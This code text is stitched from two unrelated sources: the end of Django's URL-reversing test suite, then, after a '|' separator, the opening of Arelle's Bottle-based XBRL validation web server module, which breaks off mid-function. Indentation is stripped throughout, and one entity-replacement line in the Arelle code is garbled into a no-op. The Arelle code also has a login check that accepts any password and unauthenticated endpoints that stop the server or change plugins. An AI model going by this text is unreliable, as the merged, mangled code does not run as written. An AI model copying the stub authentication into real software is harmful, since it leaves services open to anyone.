('inc-outer:inc-special-view', [42], {}, '/ns-outer/42/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_multiple_namespace_pattern(self):
"""Namespaces can be embedded."""
test_urls = [
('inc-ns1:test-ns3:urlobject-view', [], {}, '/ns-included1/test3/inner/'),
('inc-ns1:test-ns3:urlobject-view', [37, 42], {}, '/ns-included1/test3/inner/37/42/'),
(
'inc-ns1:test-ns3:urlobject-view', [], {'arg1': 42, 'arg2': 37},
'/ns-included1/test3/inner/42/37/',
),
('inc-ns1:test-ns3:urlobject-special-view', [], {}, '/ns-included1/test3/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_nested_namespace_pattern(self):
"""Namespaces can be nested."""
test_urls = [
(
'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', [], {},
'/ns-included1/ns-included4/ns-included1/test3/inner/',
),
(
'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', [37, 42], {},
'/ns-included1/ns-included4/ns-included1/test3/inner/37/42/',
),
(
'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', [], {'arg1': 42, 'arg2': 37},
'/ns-included1/ns-included4/ns-included1/test3/inner/42/37/',
),
(
'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-special-view', [], {},
'/ns-included1/ns-included4/ns-included1/test3/inner/+%5C$*/',
),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_lookup_object(self):
"""A default application namespace can be used for lookup."""
test_urls = [
('testapp:urlobject-view', [], {}, '/default/inner/'),
('testapp:urlobject-view', [37, 42], {}, '/default/inner/37/42/'),
('testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/default/inner/42/37/'),
('testapp:urlobject-special-view', [], {}, '/default/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_lookup_object_with_default(self):
"""A default application namespace is sensitive to the current app."""
test_urls = [
('testapp:urlobject-view', [], {}, 'test-ns3', '/default/inner/'),
('testapp:urlobject-view', [37, 42], {}, 'test-ns3', '/default/inner/37/42/'),
('testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'test-ns3', '/default/inner/42/37/'),
('testapp:urlobject-special-view', [], {}, 'test-ns3', '/default/inner/+%5C$*/'),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)
def test_app_lookup_object_without_default(self):
"""
An application namespace without a default is sensitive to the current
app.
"""
test_urls = [
('nodefault:urlobject-view', [], {}, None, '/other2/inner/'),
('nodefault:urlobject-view', [37, 42], {}, None, '/other2/inner/37/42/'),
('nodefault:urlobject-view', [], {'arg1': 42, 'arg2': 37}, None, '/other2/inner/42/37/'),
('nodefault:urlobject-special-view', [], {}, None, '/other2/inner/+%5C$*/'),
('nodefault:urlobject-view', [], {}, 'other-ns1', '/other1/inner/'),
('nodefault:urlobject-view', [37, 42], {}, 'other-ns1', '/other1/inner/37/42/'),
('nodefault:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'other-ns1', '/other1/inner/42/37/'),
('nodefault:urlobject-special-view', [], {}, 'other-ns1', '/other1/inner/+%5C$*/'),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)
def test_special_chars_namespace(self):
test_urls = [
('special:included_namespace_urls:inc-normal-view', [], {}, '/+%5C$*/included/normal/'),
('special:included_namespace_urls:inc-normal-view', [37, 42], {}, '/+%5C$*/included/normal/37/42/'),
(
'special:included_namespace_urls:inc-normal-view', [], {'arg1': 42, 'arg2': 37},
'/+%5C$*/included/normal/42/37/',
),
('special:included_namespace_urls:inc-special-view', [], {}, '/+%5C$*/included/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespaces_with_variables(self):
"""Namespace prefixes can capture variables."""
test_urls = [
('inc-ns5:inner-nothing', [], {'outer': '70'}, '/inc70/'),
('inc-ns5:inner-extra', [], {'extra': 'foobar', 'outer': '78'}, '/inc78/extra/foobar/'),
('inc-ns5:inner-nothing', ['70'], {}, '/inc70/'),
('inc-ns5:inner-extra', ['78', 'foobar'], {}, '/inc78/extra/foobar/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_nested_app_lookup(self):
"""
A nested current_app should be split in individual namespaces (#24904).
"""
test_urls = [
('inc-ns1:testapp:urlobject-view', [], {}, None, '/ns-included1/test4/inner/'),
('inc-ns1:testapp:urlobject-view', [37, 42], {}, None, '/ns-included1/test4/inner/37/42/'),
('inc-ns1:testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, None, '/ns-included1/test4/inner/42/37/'),
('inc-ns1:testapp:urlobject-special-view', [], {}, None, '/ns-included1/test4/inner/+%5C$*/'),
('inc-ns1:testapp:urlobject-view', [], {}, 'inc-ns1:test-ns3', '/ns-included1/test3/inner/'),
('inc-ns1:testapp:urlobject-view', [37, 42], {}, 'inc-ns1:test-ns3', '/ns-included1/test3/inner/37/42/'),
(
'inc-ns1:testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'inc-ns1:test-ns3',
'/ns-included1/test3/inner/42/37/',
),
(
'inc-ns1:testapp:urlobject-special-view', [], {}, 'inc-ns1:test-ns3',
'/ns-included1/test3/inner/+%5C$*/',
),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)
def test_current_app_no_partial_match(self):
"""current_app shouldn't be used unless it matches the whole path."""
test_urls = [
('inc-ns1:testapp:urlobject-view', [], {}, 'nonexistent:test-ns3', '/ns-included1/test4/inner/'),
(
'inc-ns1:testapp:urlobject-view', [37, 42], {}, 'nonexistent:test-ns3',
'/ns-included1/test4/inner/37/42/',
),
(
'inc-ns1:testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'nonexistent:test-ns3',
'/ns-included1/test4/inner/42/37/',
),
(
'inc-ns1:testapp:urlobject-special-view', [], {}, 'nonexistent:test-ns3',
'/ns-included1/test4/inner/+%5C$*/',
),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)
@override_settings(ROOT_URLCONF=urlconf_outer.__name__)
class RequestURLconfTests(SimpleTestCase):
def test_urlconf(self):
response = self.client.get('/test/me/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'outer:/test/me/,inner:/inner_urlconf/second_test/')
response = self.client.get('/inner_urlconf/second_test/')
self.assertEqual(response.status_code, 200)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 404)
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
]
)
def test_urlconf_overridden(self):
response = self.client.get('/test/me/')
self.assertEqual(response.status_code, 404)
response = self.client.get('/inner_urlconf/second_test/')
self.assertEqual(response.status_code, 404)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'outer:,inner:/second_test/')
@override_settings(
MIDDLEWARE=[
'%s.NullChangeURLconfMiddleware' % middleware.__name__,
]
)
def test_urlconf_overridden_with_null(self):
"""
Overriding request.urlconf with None will fall back to the default
URLconf.
"""
response = self.client.get('/test/me/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'outer:/test/me/,inner:/inner_urlconf/second_test/')
response = self.client.get('/inner_urlconf/second_test/')
self.assertEqual(response.status_code, 200)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 404)
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseInnerInResponseMiddleware' % middleware.__name__,
]
)
def test_reverse_inner_in_response_middleware(self):
"""
Test reversing an URL from the *overridden* URLconf from inside
a response middleware.
"""
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'/second_test/')
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseOuterInResponseMiddleware' % middleware.__name__,
]
)
def test_reverse_outer_in_response_middleware(self):
"""
Test reversing an URL from the *default* URLconf from inside
a response middleware.
"""
message = "Reverse for 'outer' not found."
with self.assertRaisesMessage(NoReverseMatch, message):
self.client.get('/second_test/')
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseInnerInStreaming' % middleware.__name__,
]
)
def test_reverse_inner_in_streaming(self):
"""
Test reversing an URL from the *overridden* URLconf from inside
a streaming response.
"""
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 200)
self.assertEqual(b''.join(response), b'/second_test/')
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseOuterInStreaming' % middleware.__name__,
]
)
def test_reverse_outer_in_streaming(self):
"""
Test reversing an URL from the *default* URLconf from inside
a streaming response.
"""
message = "Reverse for 'outer' not found."
with self.assertRaisesMessage(NoReverseMatch, message):
self.client.get('/second_test/')
b''.join(self.client.get('/second_test/'))
def test_urlconf_is_reset_after_request(self):
"""The URLconf is reset after each request."""
self.assertIsNone(get_urlconf())
with override_settings(MIDDLEWARE=['%s.ChangeURLconfMiddleware' % middleware.__name__]):
self.client.get(reverse('inner'))
self.assertIsNone(get_urlconf())
class ErrorHandlerResolutionTests(SimpleTestCase):
"""Tests for handler400, handler404 and handler500"""
def setUp(self):
urlconf = 'urlpatterns_reverse.urls_error_handlers'
urlconf_callables = 'urlpatterns_reverse.urls_error_handlers_callables'
self.resolver = URLResolver(RegexPattern(r'^$'), urlconf)
self.callable_resolver = URLResolver(RegexPattern(r'^$'), urlconf_callables)
def test_named_handlers(self):
handler = (empty_view, {})
for code in [400, 404, 500]:
with self.subTest(code=code):
self.assertEqual(self.resolver.resolve_error_handler(code), handler)
def test_callable_handlers(self):
handler = (empty_view, {})
for code in [400, 404, 500]:
with self.subTest(code=code):
self.assertEqual(self.callable_resolver.resolve_error_handler(code), handler)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls_without_full_import')
class DefaultErrorHandlerTests(SimpleTestCase):
def test_default_handler(self):
"If the urls.py doesn't specify handlers, the defaults are used"
response = self.client.get('/test/')
self.assertEqual(response.status_code, 404)
with self.assertRaisesMessage(ValueError, "I don't think I'm getting good"):
self.client.get('/bad_view/')
@override_settings(ROOT_URLCONF=None)
class NoRootUrlConfTests(SimpleTestCase):
"""Tests for handler404 and handler500 if ROOT_URLCONF is None"""
def test_no_handler_exception(self):
msg = (
"The included URLconf 'None' does not appear to have any patterns "
"in it. If you see valid patterns in the file then the issue is "
"probably caused by a circular import."
)
with self.assertRaisesMessage(ImproperlyConfigured, msg):
self.client.get('/test/me/')
@override_settings(ROOT_URLCONF='urlpatterns_reverse.namespace_urls')
class ResolverMatchTests(SimpleTestCase):
def test_urlpattern_resolve(self):
for path, url_name, app_name, namespace, view_name, func, args, kwargs in resolve_test_data:
with self.subTest(path=path):
# Legacy support for extracting "function, args, kwargs".
match_func, match_args, match_kwargs = resolve(path)
self.assertEqual(match_func, func)
self.assertEqual(match_args, args)
self.assertEqual(match_kwargs, kwargs)
# ResolverMatch capabilities.
match = resolve(path)
self.assertEqual(match.__class__, ResolverMatch)
self.assertEqual(match.url_name, url_name)
self.assertEqual(match.app_name, app_name)
self.assertEqual(match.namespace, namespace)
self.assertEqual(match.view_name, view_name)
self.assertEqual(match.func, func)
self.assertEqual(match.args, args)
self.assertEqual(match.kwargs, kwargs)
# and for legacy purposes:
self.assertEqual(match[0], func)
self.assertEqual(match[1], args)
self.assertEqual(match[2], kwargs)
def test_resolver_match_on_request(self):
response = self.client.get('/resolver_match/')
resolver_match = response.resolver_match
self.assertEqual(resolver_match.url_name, 'test-resolver-match')
def test_resolver_match_on_request_before_resolution(self):
request = HttpRequest()
self.assertIsNone(request.resolver_match)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.erroneous_urls')
class ErroneousViewTests(SimpleTestCase):
def test_noncallable_view(self):
# View is not a callable (explicit import; arbitrary Python object)
with self.assertRaisesMessage(TypeError, 'view must be a callable'):
url(r'uncallable-object/$', views.uncallable)
def test_invalid_regex(self):
# Regex contains an error (refs #6170)
msg = '(regex_error/$" is not a valid regular expression'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
reverse(views.empty_view)
class ViewLoadingTests(SimpleTestCase):
def test_view_loading(self):
self.assertEqual(get_callable('urlpatterns_reverse.views.empty_view'), empty_view)
self.assertEqual(get_callable(empty_view), empty_view)
def test_view_does_not_exist(self):
msg = "View does not exist in module urlpatterns_reverse.views."
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable('urlpatterns_reverse.views.i_should_not_exist')
def test_attributeerror_not_hidden(self):
msg = 'I am here to confuse django.urls.get_callable'
with self.assertRaisesMessage(AttributeError, msg):
get_callable('urlpatterns_reverse.views_broken.i_am_broken')
def test_non_string_value(self):
msg = "'1' is not a callable or a dot-notation path"
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable(1)
def test_string_without_dot(self):
msg = "Could not import 'test'. The path must be fully qualified."
with self.assertRaisesMessage(ImportError, msg):
get_callable('test')
def test_module_does_not_exist(self):
with self.assertRaisesMessage(ImportError, "No module named 'foo'"):
get_callable('foo.bar')
def test_parent_module_does_not_exist(self):
msg = 'Parent module urlpatterns_reverse.foo does not exist.'
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable('urlpatterns_reverse.foo.bar')
def test_not_callable(self):
msg = (
"Could not import 'urlpatterns_reverse.tests.resolve_test_data'. "
"View is not callable."
)
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable('urlpatterns_reverse.tests.resolve_test_data')
class IncludeTests(SimpleTestCase):
url_patterns = [
url(r'^inner/$', views.empty_view, name='urlobject-view'),
url(r'^inner/(?P<arg1>[0-9]+)/(?P<arg2>[0-9]+)/$', views.empty_view, name='urlobject-view'),
url(r'^inner/\+\\\$\*/$', views.empty_view, name='urlobject-special-view'),
]
app_urls = URLObject('inc-app')
def test_include_urls(self):
self.assertEqual(include(self.url_patterns), (self.url_patterns, None, None))
def test_include_namespace(self):
msg = (
'Specifying a namespace in include() without providing an '
'app_name is not supported.'
)
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include(self.url_patterns, 'namespace')
def test_include_4_tuple(self):
msg = 'Passing a 4-tuple to include() is not supported.'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include((self.url_patterns, 'app_name', 'namespace', 'blah'))
def test_include_3_tuple(self):
msg = 'Passing a 3-tuple to include() is not supported.'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include((self.url_patterns, 'app_name', 'namespace'))
def test_include_3_tuple_namespace(self):
msg = 'Cannot override the namespace for a dynamic module that provides a namespace.'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include((self.url_patterns, 'app_name', 'namespace'), 'namespace')
def test_include_2_tuple(self):
self.assertEqual(
include((self.url_patterns, 'app_name')),
(self.url_patterns, 'app_name', 'app_name')
)
def test_include_2_tuple_namespace(self):
self.assertEqual(
include((self.url_patterns, 'app_name'), namespace='namespace'),
(self.url_patterns, 'app_name', 'namespace')
)
def test_include_app_name(self):
self.assertEqual(
include(self.app_urls),
(self.app_urls, 'inc-app', 'inc-app')
)
def test_include_app_name_namespace(self):
self.assertEqual(
include(self.app_urls, 'namespace'),
(self.app_urls, 'inc-app', 'namespace')
)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls')
class LookaheadTests(SimpleTestCase):
def test_valid_resolve(self):
test_urls = [
'/lookahead-/a-city/',
'/lookbehind-/a-city/',
'/lookahead+/a-city/',
'/lookbehind+/a-city/',
]
for test_url in test_urls:
with self.subTest(url=test_url):
self.assertEqual(resolve(test_url).kwargs, {'city': 'a-city'})
def test_invalid_resolve(self):
test_urls = [
'/lookahead-/not-a-city/',
'/lookbehind-/not-a-city/',
'/lookahead+/other-city/',
'/lookbehind+/other-city/',
]
for test_url in test_urls:
with self.subTest(url=test_url):
with self.assertRaises(Resolver404):
resolve(test_url)
def test_valid_reverse(self):
test_urls = [
('lookahead-positive', {'city': 'a-city'}, '/lookahead+/a-city/'),
('lookahead-negative', {'city': 'a-city'}, '/lookahead-/a-city/'),
('lookbehind-positive', {'city': 'a-city'}, '/lookbehind+/a-city/'),
('lookbehind-negative', {'city': 'a-city'}, '/lookbehind-/a-city/'),
]
for name, kwargs, expected in test_urls:
with self.subTest(name=name, kwargs=kwargs):
self.assertEqual(reverse(name, kwargs=kwargs), expected)
def test_invalid_reverse(self):
test_urls = [
('lookahead-positive', {'city': 'other-city'}),
('lookahead-negative', {'city': 'not-a-city'}),
('lookbehind-positive', {'city': 'other-city'}),
('lookbehind-negative', {'city': 'not-a-city'}),
]
for name, kwargs in test_urls:
with self.subTest(name=name, kwargs=kwargs):
with self.assertRaises(NoReverseMatch):
reverse(name, kwargs=kwargs)
|
CntlrWebMain.py | '''
Created on Oct 3, 2010
Use this module to start Arelle in web server mode
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
from arelle.webserver.bottle import Bottle, request, response, static_file
import os, io, sys, time, threading, uuid
from arelle import Version
from arelle.FileSource import FileNamedStringIO
_os_pid = os.getpid()
def startWebserver(_cntlr, options):
"""Called once from main program in CmtlrCmdLine to initiate web server on specified local port.
To test WebServer run from source in IIS, use an entry like this: c:\python33\python.exe c:\\users\\myname\\mySourceFolder\\arelleCmdLine.py %s
:param options: OptionParser options from parse_args of main argv arguments (the argument *webserver* provides hostname and port), port being used to startup the webserver on localhost.
:type options: optparse.Values
"""
global imagesDir, cntlr, optionsPrototype
cntlr = _cntlr
imagesDir = cntlr.imagesDir
optionValuesTypes = _STR_NUM_TYPES + (type(None),)
optionsPrototype = dict((option,value if isinstance(value,_STR_NUM_TYPES) else None)
for option in dir(options)
for value in (getattr(options, option),)
if isinstance(value,optionValuesTypes) and not option.startswith('_'))
host, sep, portServer = options.webserver.partition(":")
port, sep, server = portServer.partition(":")
# start a Bottle application
app = Bottle()
GETorPOST = ('GET', 'POST')
GET = 'GET'
POST = 'POST'
# install REST API interfaces
# if necessary to support CGI hosted servers below root, add <prefix:path> as first part of routes
# and corresponding arguments to the handler methods
app.route('/rest/login', GET, login_form)
app.route('/rest/login', POST, login_submit)
app.route('/rest/logout', GET, logout)
app.route('/favicon.ico', GET, arelleIcon)
app.route('/rest/xbrl/<file:path>/open', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/close', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/validation/xbrl', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/DTS', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/concepts', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/pre', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/cal', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/dim', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/facts', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/factTable', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/roleTypes', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/arcroleTypes', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/formulae', GETorPOST, validation)
app.route('/rest/xbrl/validation', GETorPOST, validation)
app.route('/rest/xbrl/view', GETorPOST, validation)
app.route('/rest/xbrl/open', GETorPOST, validation)
app.route('/rest/xbrl/close', GETorPOST, validation)
app.route('/images/<imgFile>', GET, image)
app.route('/rest/xbrl/diff', GET, diff)
app.route('/rest/configure', GET, configure)
app.route('/rest/stopWebServer', GET, stopWebServer)
app.route('/quickbooks/server.asmx', POST, quickbooksServer)
app.route('/rest/quickbooks/<qbReport>/xbrl-gl/<file:path>', GET, quickbooksGLrequest)
app.route('/rest/quickbooks/<qbReport>/xbrl-gl/<file:path>/view', GET, quickbooksGLrequest)
app.route('/rest/quickbooks/<qbReport>/xbrl-gl/view', GET, quickbooksGLrequest)
app.route('/rest/quickbooks/response', GET, quickbooksGLresponse)
app.route('/quickbooks/server.html', GET, quickbooksWebPage)
app.route('/quickbooks/localhost.crt', GET, localhostCertificate)
app.route('/localhost.crt', GET, localhostCertificate)
app.route('/help', GET, helpREST)
app.route('/about', GET, about)
app.route('/', GET, indexPageREST)
if server == "cgi":
# catch a non-REST interface by cgi Interface (may be a cgi app exe module, etc)
app.route('<cgiAppPath:path>', GETorPOST, cgiInterface)
if server == "wsgi":
return app
elif server == "cgi":
if sys.stdin is None:
sys.stdin = open(os.devnull, 'r')
app.run(server=server)
sys.exit(0)
elif server:
app.run(host=host, port=port or 80, server=server)
else:
app.run(host=host, port=port or 80)
def cgiInterface(cgiAppPath):
# route request according to content
#with open(r"c:\temp\tracecgi.log", "at", encoding="utf-8") as fh:
# fh.write("trace 2 arg={}\n".format(cgiAppPath))
if not request.query: # no parameters, index page
return indexPageCGI()
elif 'about' in request.query:
return about(cgiAppPath + "?image=arelle32.gif")
elif 'help' in request.query:
return helpREST()
elif 'image' in request.query:
return image(request.query.image)
else:
return indexPageCGI()
def login_form():
"""Request for a login form (get to */rest/login*). Corresponds to login from other providers of XBRL validation services, but
this version of Arelle does not perform accounting or charges for validation requests, so the login is ignored.
:returns: str -- HTML login form to enter and submit via method=POST these fields: name, password
"""
return _('''<html><body><form method="POST"><table>
<tr><td>Name:</td><td><input name="name" type="text" /></td></tr>
<tr><td>Password:</td><td><input name="password" type="password" /></td></tr>
<tr><td> </td><td><input type="submit" value="Submit" /></td></tr>
</table></form></body></html>''')
def login_submit():
"""Login of fields from login form (post to */rest/login*). Saves user ID for future use.
:param name: User ID
:param password: Password
"""
name = request.forms.get('name')
password = request.forms.get('password')
if checkLogin(name, password):
return _("<p>You are logged in as user: {0}</p>").format(name)
else:
return _("<p>Login failed</p>")
def checkLogin(_user, _password):
"""Save user ID for future use. Password not currently processed.
:returns: bool -- True (for now, future user may interact with authentication and accounting services.)
"""
global user
user = _user
return True
def logout():
"""Request to log out (get */rest/logout*). Removes any proior user ID from session.
:returns: html -- Message that user has logged out
"""
global user
user = None
return _("<p>You are logged out.</p>")
def arelleIcon():
"""Request for icon for URL display (get */favicon.ico*).
:returns: ico -- Icon file for browsers
"""
return static_file("arelle.ico", root=imagesDir, mimetype='image/vnd.microsoft.icon')
def image(imgFile):
"""Request for an image file for URL display (get */images/<imgFile>*).
:returns: image file -- Requested image file from images directory of application for browsers
"""
return static_file(imgFile, root=imagesDir)
validationOptions = {
# these options have no value (after + in query)
"efm": ("validateEFM", True),
"efm-pragmatic": ("disclosureSystemName", "efm-pragmatic"),
"efm-strict": ("disclosureSystemName", "efm-strict"),
"disclosure-system": ("disclosureSystemName", None),
"ifrs": ("gfmName", "ifrs"),
"hmrc": ("gfmName", "hmrc"),
"sbr-nl": ("gfmName", "sbr-nl"),
"utr": ("utrValidate", True),
"infoset": ("infosetValidate", True),
# these parameters pass through the value after + in query
"import": ("importFiles", None),
}
class Options():
"""Class to emulate options needed by CntlrCmdLine.run"""
def __init__(self):
for option, defaultValue in optionsPrototype.items():
setattr(self, option, defaultValue)
supportedViews = {'DTS', 'concepts', 'pre', 'cal', 'dim', 'facts', 'factTable', 'formulae', 'roleTypes', 'arcroleTypes'}
def validation(file=None):
"""REST request to validate, by *get* or *post*, to URL patterns including */rest/xbrl/<file:path>/{open|close|validation|DTS...}*,
and */rest/xbrl/{view|open|close}*.
Sets up CntrlCmdLine options for request, performed by runOptionsAndGetResult using CntlrCmdLine.run with get or post arguments.
:returns: html, xhtml, xml, json, text -- Return per media type argument and request arguments
"""
errors = []
flavor = request.query.flavor or 'standard'
media = request.query.media or 'html'
requestPathParts = request.urlparts[2].split('/')
isValidation = 'validation' == requestPathParts[-1] or 'validation' == requestPathParts[-2]
view = request.query.view
viewArcrole = request.query.viewArcrole
if request.method == 'POST':
sourceZipStream = request.body
mimeType = request.get_header("Content-Type")
if mimeType not in ('application/zip', 'application/x-zip', 'application/x-zip-compressed', 'multipart/x-zip'):
errors.append(_("POST must provide a zip file, Content-Type '{0}' not recognized as a zip file.").format(mimeType))
else:
sourceZipStream = None
if not view and not viewArcrole:
if requestPathParts[-1] in supportedViews:
view = requestPathParts[-1]
if isValidation:
if view or viewArcrole:
errors.append(_("Only validation or one view can be specified in one requested."))
if media not in ('xml', 'xhtml', 'html', 'json', 'text') and not (sourceZipStream and media == 'zip'):
errors.append(_("Media '{0}' is not supported for validation (please select xhtml, html, xml, json or text)").format(media))
elif view or viewArcrole:
if media not in ('xml', 'xhtml', 'html', 'csv', 'json'):
errors.append(_("Media '{0}' is not supported for view (please select xhtml, html, xml, csv, or json)").format(media))
elif requestPathParts[-1] not in ("open", "close"):
errors.append(_("Neither validation nor view requested, nothing to do."))
if (flavor not in ('standard', 'standard-except-formula', 'formula-compile-only', 'formula-compile-and-run')
and not flavor.startswith('edgar') and not flavor.startswith('sec')):
errors.append(_("Flavor '{0}' is not supported").format(flavor))
if view and view not in supportedViews:
errors.append(_("View '{0}' is not supported").format(view))
if errors:
errors.insert(0, _("URL: ") + (file or request.query.file or '(no file)'))
return errorReport(errors, media)
options = Options() # need named parameters to simulate options
isFormulaOnly = False
for key, value in request.query.items():
if key == "file":
setattr(options, "entrypointFile", value)
elif key == "flavor":
if value.startswith("sec") or value.startswith("edgar"):
setattr(options, "validateEFM", True)
elif value == "formula-compile-only":
isFormulaOnly = True
setattr(options, "formulaAction", "validate")
elif value == "formula-compile-and-run":
isFormulaOnly = True
setattr(options, "formulaAction", "run")
elif value == "standard-except-formula":
setattr(options, "formulaAction", "none")
elif key in("media", "view", "viewArcrole"):
pass
elif key in validationOptions:
optionKey, optionValue = validationOptions[key]
setattr(options, optionKey, optionValue if optionValue is not None else value)
elif not value: # convert plain str parameter present to True parameter
setattr(options, key, True)
else:
setattr(options, key, value)
if file:
setattr(options, "entrypointFile", file.replace(';','/'))
requestPathParts = set(request.urlparts[2].split('/'))
viewFile = None
if isValidation:
if not isFormulaOnly:
setattr(options, "validate", True)
elif view:
viewFile = FileNamedStringIO(media)
setattr(options, view + "File", viewFile)
elif viewArcrole:
viewFile = FileNamedStringIO(media)
setattr(options, "viewArcrole", viewArcrole)
setattr(options, "viewFile", viewFile)
return runOptionsAndGetResult(options, media, viewFile, sourceZipStream)
def runOptionsAndGetResult(options, media, viewFile, sourceZipStream=None):
"""Execute request according to options, for result in media, with *post*ed file in sourceZipStream, if any.
:returns: html, xml, csv, text -- Return per media type argument and request arguments
"""
if media == "zip" and not viewFile:
responseZipStream = io.BytesIO()
else:
responseZipStream = None
successful = cntlr.run(options, sourceZipStream, responseZipStream)
if media == "xml":
response.content_type = 'text/xml; charset=UTF-8'
elif media == "csv":
response.content_type = 'text/csv; charset=UTF-8'
elif media == "json":
response.content_type = 'application/json; charset=UTF-8'
elif media == "text":
response.content_type = 'text/plain; charset=UTF-8'
elif media == "zip":
response.content_type = 'application/zip; charset=UTF-8'
else:
response.content_type = 'text/html; charset=UTF-8'
if successful and viewFile:
# defeat re-encoding
result = viewFile.getvalue().replace(" ","\u00A0").replace("­","\u00AD").replace("&","&")
viewFile.close()
elif media == "zip":
responseZipStream.seek(0)
result = responseZipStream.read()
responseZipStream.close()
elif media == "xml":
result = cntlr.logHandler.getXml()
elif media == "json":
result = cntlr.logHandler.getJson()
elif media == "text":
result = cntlr.logHandler.getText()
else:
result = htmlBody(tableRows(cntlr.logHandler.getLines(), header=_("Messages")))
return result
def diff():
"""Execute versioning diff request for *get* request to */rest/xbrl/diff*.
:returns: xml -- Versioning report.
"""
if not request.query.fromDTS or not request.query.toDTS or not request.query.report:
return _("From DTS, to DTS, and report must be specified")
options = Options()
setattr(options, "entrypointFile", request.query.fromDTS)
setattr(options, "diffFile", request.query.toDTS)
fh = FileNamedStringIO(request.query.report)
setattr(options, "versReportFile", fh)
cntlr.run(options)
reportContents = fh.getvalue()
fh.close()
response.content_type = 'text/xml; charset=UTF-8'
return reportContents
def configure():
"""Set up features for *get* requests to */rest/configure*, e.g., proxy or plug-ins.
:returns: html -- Status of configuration request (e.g., proxy or plug-ins).
"""
if not request.query.proxy and not request.query.plugins and not request.query.packages and 'environment' not in request.query:
return _("proxy, plugins, packages or environment must be specified")
options = Options()
if request.query.proxy:
setattr(options, "proxy", request.query.proxy)
if request.query.plugins:
setattr(options, "plugins", request.query.plugins)
if request.query.packages:
setattr(options, "packages", request.query.packages)
if 'environment' in request.query:
setattr(options, "showEnvironment", True)
cntlr.run(options)
response.content_type = 'text/html; charset=UTF-8'
return htmlBody(tableRows(cntlr.logHandler.getLines(), header=_("Configuration Request")))
def stopWebServer():
"""Stop the web server by *get* requests to */rest/stopWebServer*.
"""
def stopSoon(delaySeconds):
time.sleep(delaySeconds)
import signal
